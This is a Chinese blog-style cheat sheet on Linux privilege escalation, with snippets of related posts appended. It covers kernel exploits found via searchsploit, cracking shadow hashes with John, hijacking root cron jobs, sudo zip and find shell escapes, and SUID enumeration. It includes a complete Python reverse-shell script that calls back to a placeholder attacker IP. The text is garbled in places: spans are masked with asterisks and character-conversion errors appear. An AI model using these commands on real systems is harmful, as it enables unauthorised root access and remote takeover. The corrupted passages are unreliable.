檢視系統發行版本cat /etc/issue或者cat /etc/*-release
,檢視核心資訊uname -a
。根據版本資訊使用searchsploit ***
來查詢發行的核心版本是否存在核心溢位漏洞,如果存在漏洞可以直接利用漏洞**來提公升許可權:
* 上傳漏洞**,使用gcc ***.c -o exploit
將**編譯成名為exploit的可執行檔案
*chmod +x exploit
賦予執行許可權
*./exploit
執行漏洞進行提權
明文root密碼提權,檢視/etc/shadows
裡面儲存密碼的hash(一般只有root許可權可讀),如果可以檢視到shadow裡面的密碼:
* 進入etc目錄下
* 使用unshadow passwd shadow >cracked
*john cracked
進行破解密碼
計畫任務,系統中會存在一些定時執行的任務,可以使用cat /etc/crontab
檢視定時任務,是否可以替換root定時執行的檔案來獲取root許可權。如果存在.py檔案可以使用如下python指令碼代替。攻擊機上使用nc -nlvp 4444
監聽4444埠
*
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.af_inet,socket.sock_stream)
s.connect(("攻擊機ip",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
密碼復用,對靶機上的資訊進行檢視,看看是否存在一些網頁配置檔案,資料庫配置檔案。如果存在,檢視是否有賬號密碼等敏感資訊,可以嘗試靶機開放ssh服務的情況下進行遠端登入。
root提權命令,使用sudo -l
可以檢視當前使用者
可以執行的root提權命令,如果存在就可以使用相關命令進行提權。下面使用zip壓縮命令進行舉例:
*mkdir exp
新建乙個資料夾
*sudo -u root zip exp.zip exp -t -unzip-command="sh -c /bin/bash"
*find / -name 1.txt -exec "whoami" \;
find提權find / -name 1.txt -exec "/bin/sh" \;
利用suid位進行提權find / -perm -u=s -type f 2>/dev/null
查詢具有suid的程式進行提權。
linux下 udf提權 mysql udf提權
前言 udf user defined function 即 使用者自定義函式 檔案字尾為 dll 常用c語言編寫。通過在udf檔案中定義新函式,對mysql的功能進行擴充,可以執行系統任意命令。將mysql賬號root轉化為系統system許可權。思路 1.將udf檔案上傳到指定位置 sqlmap...
內網滲透 linux提權
查詢所有者為使用者的檔案 find type f user 使用者名稱 2 dev null 檢視帶有root許可權的suid命令 find type f perm u s 2 dev null find perm g s o perm u s type f 2 dev null type d 目錄...
Linux下提權練習
為線下awd準備 主要包括的方式 利用髒牛提權 利用searchsploit核心漏洞exp提權 利用suid 低版本nmap互動提權。其他利用方式後續補充。uname a 獲取核心版本資訊 cat etc issue 檢視發行版 利用核心版本需要 2.6.22且小於3.9 髒牛pocslink 閱讀...